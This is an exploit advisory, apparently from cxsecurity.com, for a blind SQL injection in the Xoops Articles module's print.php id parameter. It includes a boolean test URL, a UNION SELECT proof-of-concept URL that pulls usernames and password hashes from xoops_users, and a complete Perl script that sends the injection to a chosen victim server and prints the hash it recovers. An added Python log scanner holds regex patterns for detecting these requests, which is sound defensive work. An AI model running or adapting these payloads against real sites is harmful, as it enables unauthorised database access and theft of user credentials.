Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

2007.06.26
Credit: UniquE
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Type : SQL Injection
Release Date : {2007-03-26}
Product / Vendor : Xoops Portal
http://www.Xoops.Org

Bug :
http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0

PoC :
http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

Exploit :

#!/usr/bin/perl -w
#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################
use IO::Socket;
if (@ARGV != 3)
{
    print "\n-----------------------------------\n";
    print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit\n";
    print "-----------------------------------\n";
    print "\nUniquE-Key{UniquE-Cracker}\n";
    print "UniquE[at]UniquE-Key.ORG\n";
    print "http://UniquE-Key.ORG\n";
    print "\n-----------------------------------\n";
    print "\nUsage: $0 <server> <path> <uid>\n";
    print "Examp: $0 www.victim.com /path 1\n";
    print "\n-----------------------------------\n";
    exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$uid);

while(<$socket>)
{
    if (/>(\w{32})</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}

Tested : All Version

Author : UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org
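For defenders, the request pattern above can be found in web server access logs. The following is an added example, not part of the original advisory: it flags requests to modules/articles/print.php whose id parameter is not a plain integer. It assumes Apache/nginx combined-format logs and that legitimate article ids are numeric; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RE = re.compile(r'"[A-Z]+ (.+?) HTTP/\d\.\d"')
TARGET = "/modules/articles/print.php"  # script path named in the advisory
SIGNS = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("boolean-test", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jun/2007:10:00:01 +0000] "GET /modules/articles/print.php?id=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Jun/2007:10:02:13 +0000] "GET /modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,pass/**/FROM/**/xoops_users/* HTTP/1.0" 200 4801',
    '192.0.2.44 - - [26/Jun/2007:10:02:20 +0000] "GET /modules/articles/print.php?id=3%20AND%201%3D1 HTTP/1.0" 200 5120',
    '192.0.2.10 - - [26/Jun/2007:10:03:00 +0000] "GET /modules/news/print.php?id=abc HTTP/1.1" 404 310',
]


def suspicious_id(line):
    """Return the decoded id value if the request targets print.php with a
    non-integer id, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith(TARGET):
        return None
    # parse_qs percent-decodes, so encoded spaces and '=' are normalised.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if not re.fullmatch(r"\d+", value):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_id, tags) for every suspicious request."""
    hits = []
    for line in lines:
        value = suspicious_id(line)
        if value is None:
            continue
        # Treat /**/ as whitespace, as the database would, before matching.
        norm = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
        tags = [name for name, rx in SIGNS if rx.search(norm)]
        if "/*" in value:
            tags.append("inline-comment")
        hits.append((line.split()[0], value, tags))
    return hits
```

The integer test is the primary signal; the tags only help triage, since any non-numeric id reaching this script is already anomalous.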


Copyright 2021, cxsecurity.com

 
